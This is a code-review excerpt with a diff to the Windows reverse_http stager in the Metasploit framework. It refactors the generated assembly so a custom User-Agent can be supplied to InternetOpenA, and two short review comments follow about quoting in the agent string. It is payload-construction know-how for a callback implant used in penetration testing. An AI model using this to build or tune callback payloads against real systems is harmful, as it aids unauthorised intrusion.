lib/msf/core/payload/windows/reverse_http.rb

```diff
@@ -255,32 +255,43 @@ def asm_reverse_http(opts={})
         xor ebx, ebx           ; Set ebx to NULL to use in future arguments
     ^
 
+    asm << %Q^
+    internetopen:
+      push ebx               ; DWORD dwFlags
+    ^
     if proxy_enabled
       asm << %Q^
-      internetopen:
-        push ebx               ; DWORD dwFlags
         push esp               ; LPCTSTR lpszProxyBypass ("" = empty string)
       call get_proxy_server
         db "#{proxy_info}", 0x00
       get_proxy_server:
                                ; LPCTSTR lpszProxyName (via call)
         push 3                 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
-        push ebx               ; LPCTSTR lpszAgent (NULL)
-        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
-        call ebp
       ^
     else
       asm << %Q^
-      internetopen:
-        push ebx               ; DWORD dwFlags
         push ebx               ; LPCTSTR lpszProxyBypass (NULL)
         push ebx               ; LPCTSTR lpszProxyName (NULL)
         push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
+      ^
+    end
+    if opts[:ua].to_s.empty?
+      asm << %Q^
         push ebx               ; LPCTSTR lpszAgent (NULL)
-        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
-        call ebp
+      ^
+    else
+      asm << %Q^
+        push ebx               ; LPCTSTR lpszProxyBypass (NULL)
+      call get_useragent
+        db "#{opts[:ua]}", 0x00
```

Comment:
Do we have to cater for the (admittedly stupid) case where someone puts a `"` in the agent name?

Reply:
Hmm, on review I think my thick skull finally figured out what you meant; I'll just relax this to a nil? check instead

Reply:
OK, updated.